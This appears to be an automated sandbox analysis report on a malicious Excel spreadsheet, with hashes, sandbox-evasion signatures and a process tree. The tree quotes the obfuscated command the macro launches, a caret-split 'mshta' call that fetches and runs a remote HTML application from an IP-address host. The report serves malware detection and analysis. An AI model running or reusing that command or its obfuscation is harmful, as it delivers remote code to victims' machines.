Analysis
-
max time kernel
134s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 16:21
Behavioral task
behavioral1
Sample
4b969e0e8bacd113380394b18185717705faa47f3b6b6fcf3f989392f72b5328.xls
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
4b969e0e8bacd113380394b18185717705faa47f3b6b6fcf3f989392f72b5328.xls
Resource
win10v2004-20241007-en
General
-
Target
4b969e0e8bacd113380394b18185717705faa47f3b6b6fcf3f989392f72b5328.xls
-
Size
36KB
-
MD5
51e8d88d8a478776909eb8b9e359cabd
-
SHA1
25b38dad91febf7b36d48aa03db2486394240cdf
-
SHA256
4b969e0e8bacd113380394b18185717705faa47f3b6b6fcf3f989392f72b5328
-
SHA512
2751b8b9d77fce6f3c12809dbe0a728fe53bf9bd3cd83eb5f1111440ce3a0daa0a69a6142212384bf48c7603c5c91e4c17e4e8a5eb97a79f071f838f2913d747
-
SSDEEP
768:f1kk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJjj6ehEnmEzk:f1kk3hbdlylKsgqopeJBWhZFGkE+cL2V
Malware Config
Extracted
http://91.240.118.168/oo/aa/se.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4204 4212 CMD.EXE 81 -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 3276 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4212 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE 4212 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4212 wrote to memory of 4204 4212 EXCEL.EXE 85 PID 4212 wrote to memory of 4204 4212 EXCEL.EXE 85 PID 4204 wrote to memory of 3276 4204 CMD.EXE 87 PID 4204 wrote to memory of 3276 4204 CMD.EXE 87
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4b969e0e8bacd113380394b18185717705faa47f3b6b6fcf3f989392f72b5328.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Windows\SYSTEM32\CMD.EXECMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\system32\mshta.exemshta http://91.240.118.168/oo/aa/se.html3⤵
- Blocklisted process makes network request
PID:3276
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize3KB
MD5dc345f6a6adbb82663dd6ff077ea3195
SHA1a8cce1d81fc09f70902b224a52768a76b3722096
SHA256a98cc558a9cc20d713c7a1a7bff5f6bbc0a2f9d84ed7973f22c0aa1cf87c519f
SHA5124fb281633fb951c9ad1e6718391d3ade80c3e15b803c3116c1934fdc8a14cd254a9ebafaf9e855372b5d421619346efbe0a79da9481ed740c29c51220a20dcf0